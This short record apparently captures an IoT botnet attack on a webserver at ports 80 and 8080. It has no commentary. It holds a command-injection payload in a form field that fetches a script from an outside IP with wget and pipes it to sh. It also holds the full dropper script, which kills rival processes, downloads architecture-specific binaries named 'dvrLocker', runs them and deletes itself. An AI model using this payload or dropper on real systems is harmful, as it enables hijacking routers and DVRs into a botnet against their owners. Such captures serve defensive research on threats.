attack: webserver
port: 80, 8080
command: form=country&operation=write&country=$(id>`wget+-O-+http://154-216.18.196/t|sh;`)
script:
#!/bin/sh
n="arm arm5 arm6 arm7 mips mpsl ppc sh4 x86"
http_server="154-216.18.196"

for proc_dir in /proc/*; do
    pid=${proc_dir##*/}

    result=$(ls -l "/proc/$pid/exe" 2> /dev/null)

    if [ "$result" != "${result%(deleted)}" ]; then
        kill -9 "$pid"
    fi
done

# send tmp-rw directories
cd /tmp
cd /var/tmp
cd /tmp/tmpfs
cd /dev/shm
cd /var/run

for a in $n
do
        wget http://$http_server/e$a -O -> dvrLocker
        chmod 777 dvrLocker
        ./dvrLocker tplink
done

rm $0
